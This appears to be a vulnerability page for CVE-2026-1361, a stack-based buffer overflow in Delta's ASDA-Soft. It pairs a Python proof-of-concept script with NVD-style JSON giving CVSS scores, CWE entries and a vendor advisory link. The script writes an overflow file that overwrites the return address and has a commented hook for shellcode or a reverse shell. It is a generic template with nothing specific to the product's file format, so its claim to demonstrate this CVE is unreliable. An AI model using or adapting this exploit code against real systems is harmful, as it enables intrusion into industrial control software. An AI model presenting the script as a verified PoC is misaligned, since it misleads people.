CVE-2026-1361

#!/usr/bin/env python3 # CVE-2026-1361 PoC - ASDA-Soft Stack-based Buffer Overflow # This PoC demonstrates the buffer overflow condition # Usage: Generate malicious input file and open with vulnerable ASDA-Soft import struct import sys def generate_poc(): """ Generate PoC payload for CVE-2026-1361 The vulnerability is a stack-based buffer overflow in ASDA-Soft """ # Buffer size varies - adjust based on target buffer_size = 1024 # Example buffer size # Padding to fill the buffer padding = b'A' * buffer_size # Overwrite saved return address # Address to jump to (e.g., shellcode location or existing function) return_address = struct.pack('<I', 0x41414141) # Placeholder address # Additional padding to reach saved EBP ebp_padding = b'B' * 8 # Construct the payload payload = padding + return_address + ebp_padding # Add shellcode if needed (optional) # shellcode = b'\x90' * 16 + calc.exe or reverse_shell # payload += shellcode return payload def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <output_file>") print("Generates PoC for CVE-2026-1361") sys.exit(1) output_file = sys.argv[1] payload = generate_poc() with open(output_file, 'wb') as f: f.write(payload) print(f"PoC payload written to {output_file}") print(f"Payload size: {len(payload)} bytes") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2026-1361", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2026-01-27T04:16:03.580", "lastModified": "2026-02-17T20:12:13.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ASDA-Soft Stack-based Buffer Overflow Vulnerability"}, {"lang": "es", "value": "Vulnerabilidad de desbordamiento de búfer basado en pila de ASDA-Soft."}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deltaww:asda_soft:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.2.2.0", "matchCriteriaId": "483DA02E-356F-4801-9394-4B7617CDAA69"}]}]}], "references": [{"url": "https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00003_ASDA-Soft%20Stack-based%20Buffer%20Overflow%20Vulnerability%20(CVE-2026-1361).pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}